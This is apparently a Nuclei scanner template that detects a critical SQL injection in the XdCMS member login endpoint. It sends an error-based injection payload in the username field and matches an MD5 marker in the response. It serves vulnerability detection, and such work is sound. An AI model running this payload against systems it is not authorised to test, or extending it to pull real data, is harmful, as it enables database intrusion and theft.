id: xdcms-sqli info: name: XdCMS - SQL Injection author: pikpikcu severity: critical description: XdCMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.uedbox.com/post/35188/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-89 tags: sqli,xdcms variables: num: "999999999" requests: - method: POST path: - "{{BaseURL}}/index.php?m=member&f=login_save" headers: Content-Type: application/x-www-form-urlencoded body: | username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+ matchers-condition: and matchers: - type: word words: - "Content-Type: text/html" part: header - type: word words: - '{{md5({{num}})}}' part: body - type: status status: - 200 # Enhanced by mp on 2022/09/28